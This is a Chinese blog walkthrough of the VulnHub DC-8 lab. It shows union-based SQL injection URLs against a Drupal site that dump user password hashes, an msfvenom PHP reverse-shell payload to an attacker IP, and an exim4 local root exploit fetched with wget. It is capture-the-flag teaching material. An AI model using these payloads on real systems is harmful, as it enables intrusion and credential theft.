vulnhub之DC8靶机

最新推荐文章于 2024-03-21 20:40:05 发布

lainwith

最新推荐文章于 2024-03-21 20:40:05 发布

阅读量2.9k

点赞数

分类专栏：靶机文章标签： vulnhub

本文链接：https://blog.csdn.net/weixin_44288604/article/details/122944302

版权

靶机专栏收录该内容

62 篇文章 28 订阅

订阅专栏

介绍

系列： DC（此系列共10台）
发布日期：2019年9月8日
难度：中级
Flag：此挑战的最终目标是绕过双因素身份验证，获取root权限并读取唯一的Flag
学习：

sql注入
网站挂马
exim4提权

靶机地址：https://www.vulnhub.com/entry/dc-8,367/
从靶场得到提示信息：

靶机更适用Virtualbox

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说，出现“PCS Systemtechnik GmbH”就是靶机。

netdiscover -i eth0 -r 192.168.1.0/24

在这里插入图片描述

主机信息探测

信息探测：nmap -A -p- 192.168.1.125，只开放了22和80端口
在这里插入图片描述

访问网站

得知网站是 drupal 站点，没得到什么有价值的信息。
在这里插入图片描述

目录扫描

没有发现什么有价值的线索，唯一看起来有点用的是登录页面：http://192.168.1.125/user

dirb http://192.168.1.125/ | grep -v 403

在这里插入图片描述

漏洞发现

目录扫描没发现啥有意思的东东，只能回来在网站上点点点，点击红框中的内容时，发现url栏中有id在变换，可以试试会不会存在sql注入
在这里插入图片描述

可以直接单引号报错，有搞头
在这里插入图片描述

手工SQL联合查询注入

1. 判断列数，得知是1列

目的：只有猜解出列数，下一步才能判断哪些列数是可以被利用的
思路：使用order by关键字对数据库中的列进行排序。
如果列数正确那就能正常显示，否则会出错，列数的选择使用二分法来确定

http://192.168.1.125/?nid=1 order by 1--+

在这里插入图片描述

2. 数据查询&信息收集（union select）

需要知道，页面的内容，是由哪列显示出来的
方法：让id值为假，来执行后面的语句

由于我这里只有1列，所以直接查询了，比较简单。

获取数据库版本、名字

查询到数据库名字： d7db 
http://192.168.1.125/?nid=-1 union select database() --+

查询数据库版本：10.1.26-MariaDB-0+deb9u1
http://192.168.1.125/?nid=-1 union select version() --+

在这里插入图片描述

3. 获取数据库的表名

下面两个命令是等价的，通过搜索“users”发现存在相关数据表。

http://192.168.1.125/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database()--+
http://192.168.1.125/?nid=-1%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='d7db'--+

在这里插入图片描述

4. 查询指定表名下的列名信息

注意到存在：name和pass两列

http://192.168.1.125/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

在这里插入图片描述

5. 查询指定列获取数据

爆出users表中name、pass列的数据，爆出两个用户名admin和john及密码加密后的密文

http://192.168.1.125/?nid=-1 union select group_concat(name,':',pass) from users --+

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

在这里插入图片描述

6. 爆破密码

成功爆破出john的密码是：turtle。至于admin用户的密码，就让软件后台先跑着吧
在这里插入图片描述

反弹shell

按照 DC7靶机的经验，估计也是通过文本编辑器写入一句话木马获得shell。由于webshell管理工具的字体大小、背景颜色不便于截图展示，所以我这里还是用msf来做吧。

生成后门
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.118 lport=4444 -f raw

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit

获取交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

输入恶意代码后，点击页面最下方的“应用”按钮，然后回到上一级页面，点击刚刚编辑的“Content Us”页面
在这里插入图片描述

随便输入点东西，点击“Submit”按钮，拿到shell
在这里插入图片描述

提权

如下图，靶机上只有一个用户 dc8user，没有发现什么有价值的信息。
在这里插入图片描述

尝试sudo提权：find / -perm -u=s -type f 2>/dev/null
找到一个exim4命令，exim是一款在Unix系统上使用的邮件服务，exim4在使用时具有root权限。
在这里插入图片描述

exim4提权

使用方法在网上搜索一下即可知道，下面的操作是从网上搜的。

确定exim4的版本：/usr/sbin/exim4 --version

在这里插入图片描述

搜索相关本地提权的利用代码：searchsploit exim

在这里插入图片描述

投递利用代码

kali准备：
cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
python3 -m http.server 80

靶机准备：
wget http://192.168.1.118/getShell.sh
chmod +x getShell.sh
./getShell.sh -m netcat

在这里插入图片描述

拿到Flag

在这里插入图片描述

lainwith

关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
vulnhub之DC8靶机

目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数，得知是1列2. 数据查询&信息收集（union select）3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag介绍系列： DC（此系列共10台）发布日期：2019年9月8日难度：中级Flag：此挑战的最终目标是绕过双因素身份验证，获取root权限并读取唯一的Flag学习：sql注入网站挂马exim4
复制链接

扫一扫

专栏目录